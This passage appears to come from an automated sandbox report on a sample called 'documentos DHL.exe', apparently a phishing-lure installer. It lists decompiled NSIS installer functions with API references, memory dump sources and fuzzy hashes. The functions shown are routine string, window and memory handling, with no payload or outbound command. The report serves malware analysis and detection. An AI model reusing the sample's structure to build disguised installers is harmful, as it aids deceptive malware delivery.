GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004062F7();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405C81 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405C81(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405c82
0x00405c8f
0x00405c90
0x00405c9b
0x00405ca3
0x00405ca3
0x00405cab

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405D89(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E004063B0(0x425f30, _a4);
				_t21 = E00405D2C(0x425f30);
				if(_t21 != 0) {
					E00406644(_t21);
					if(( *0x42a25c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004066F3();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405CCD(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405C81();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405d95
0x00405da0
0x00405da4
0x00405dab
0x00405db7
0x00405dc7
0x00405dc9
0x00405de1
0x00405de2
0x00405de9
0x00405dea
0x00000000
0x00000000
0x00405dcd
0x00405dd4
0x00405ddc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dd4
0x00405dec
0x00000000
0x00405e00
0x00405db9
0x00405dbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dbf
0x00405da6
0x00000000

APIs

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76522EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76522EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405DE2
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76522EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76522EE0), ref: 00405DF2

Strings

0_B, xrefs: 00405D8F

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A29() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ec;
				_t3 = E00403A0E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ec =  *0x4216ec & 0x00000000;
				return _t3;
			}

0x00403a2a
0x00403a32
0x00403a39
0x00403a3c
0x00403a3c
0x00403a3e
0x00403a43
0x00403a4a
0x00403a50
0x00403a54
0x00403a55
0x00403a5d

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76522EE0,00403A00,76523420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
GlobalFree.KERNEL32(?), ref: 00403A4A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00405CCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405CCD(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405cce
0x00405cd8
0x00405cdb
0x00405ce1
0x00405ce2
0x00405ce3
0x00405ceb
0x00000000
0x00000000
0x00000000
0x00405ceb
0x00405ced
0x00405cf5

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\documentos DHL.exe,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00405CD3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\documentos DHL.exe,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00405CE3

Strings

C:\Users\user\Desktop, xrefs: 00405CCD

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405E07 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E07(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405e17
0x00405e19
0x00405e1c
0x00405e48
0x00405e21
0x00405e2a
0x00405e2f
0x00405e3a
0x00405e3d
0x00405e59
0x00405e3f
0x00405e46
0x00000000
0x00405e46
0x00405e52
0x00405e56
0x00405e56
0x00405e50
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
